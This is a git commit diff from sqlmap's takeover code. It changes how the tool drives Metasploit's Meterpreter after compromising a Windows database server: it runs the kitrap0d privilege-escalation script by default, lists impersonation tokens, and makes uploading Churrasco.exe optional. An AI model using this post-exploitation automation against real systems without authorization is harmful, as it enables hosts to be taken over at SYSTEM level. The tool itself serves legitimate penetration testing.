By default do not use Churrasco, but still let the user choose it.

The default technique to privilege escalate the OS user to SYSTEM when --priv-esc is provided now it 'run kitrap0d'.
2024-11-22 09:36:35 +03:00 · 2010-01-29 02:27:50 +00:00 · 2010-01-29 02:27:50 +00:00 · 200518724c
commit 200518724c
parent 7b8316728c
2 changed files with 16 additions and 17 deletions
--- a/lib/takeover/metasploit.py
+++ b/lib/takeover/metasploit.py
@ -443,16 +443,21 @@ class Metasploit:
            proc.stdin.write("sessions -l\n")
            proc.stdin.write("sessions -i %s\n" % metSess)

-        proc.stdin.write("getuid\n")
-
        proc.stdin.write("use espia\n")
        proc.stdin.write("use incognito\n")
        proc.stdin.write("use priv\n")
        proc.stdin.write("use sniffer\n")
+        proc.stdin.write("sysinfo\n")

        if conf.privEsc:
            print

+            infoMsg  = "trying to escalate privileges using "
+            infoMsg += "kitrap0d script"
+            logger.info(infoMsg)
+
+            proc.stdin.write("run kitrap0d\n")
+
            infoMsg  = "displaying the list of Access Tokens availables. "
            infoMsg += "Choose which user you want to impersonate by "
            infoMsg += "using incognito's command 'impersonate_token'"
@ -460,11 +465,8 @@ class Metasploit:

            proc.stdin.write("list_tokens -u\n")

-            infoMsg  = "trying also to escalate privileges using "
-            infoMsg += "kitrap0d script"
-            logger.info(infoMsg)
+            proc.stdin.write("getuid\n")

-            proc.stdin.write("run kitrap0d\n")

    def __controlMsfCmd(self, proc, func):
        stdin_fd = sys.stdin.fileno()
--- a/plugins/generic/takeover.py
+++ b/plugins/generic/takeover.py
@ -61,11 +61,11 @@ class Takeover(Abstraction, Metasploit, Registry):
    def uploadChurrasco(self):
        msg  = "do you want sqlmap to upload Churrasco and call the "
        msg += "Metasploit payload stager as its argument so that it "
-        msg += "will be started as SYSTEM? [Y/n] "
+        msg += "will be started as SYSTEM? [y/N] "

-        output = readInput(msg, default="Y")
+        output = readInput(msg, default="N")

-        if not output or output[0] in ( "y", "Y" ):
+        if output and output[0] in ( "y", "Y" ):
            tmpFile = decloakToNamedTemporaryFile(os.path.join(paths.SQLMAP_CONTRIB_PATH, "tokenkidnapping", "Churrasco.exe_"))
            
            wFile                 = tmpFile.name
@ -168,18 +168,15 @@ class Takeover(Abstraction, Metasploit, Registry):

                elif kb.dbms == "PostgreSQL":
                    warnMsg  = "by default PostgreSQL on Windows runs as postgres "
-                    warnMsg += "user which has no Windows Impersonation "
-                    warnMsg += "Tokens: it is unlikely that the privilege "
-                    warnMsg += "escalation via 'incognito' extension will "
-                    warnMsg += "be successful"
+                    warnMsg += "user which has no access to LSASS: it is "
+                    warnMsg += "unlikely that the privilege escalation "
+                    warnMsg += "via 'incognito' extension will be successful"
                    logger.warn(warnMsg)

                elif kb.dbms == "Microsoft SQL Server" and kb.dbmsVersion[0] in ( "2005", "2008" ):
                    warnMsg  = "often Microsoft SQL Server %s " % kb.dbmsVersion[0]
-                    warnMsg += "runs as Network Service which has no Windows "
-                    warnMsg += "Impersonation Tokens within all threads, this "
-                    warnMsg += "makes Meterpreter's 'incognito' extension "
-                    warnMsg += "to fail to list tokens"
+                    warnMsg += "runs as Network Service which has Windows "
+                    warnMsg += "Impersonation Tokens"
                    logger.warn(warnMsg)

                    uploaded = self.uploadChurrasco()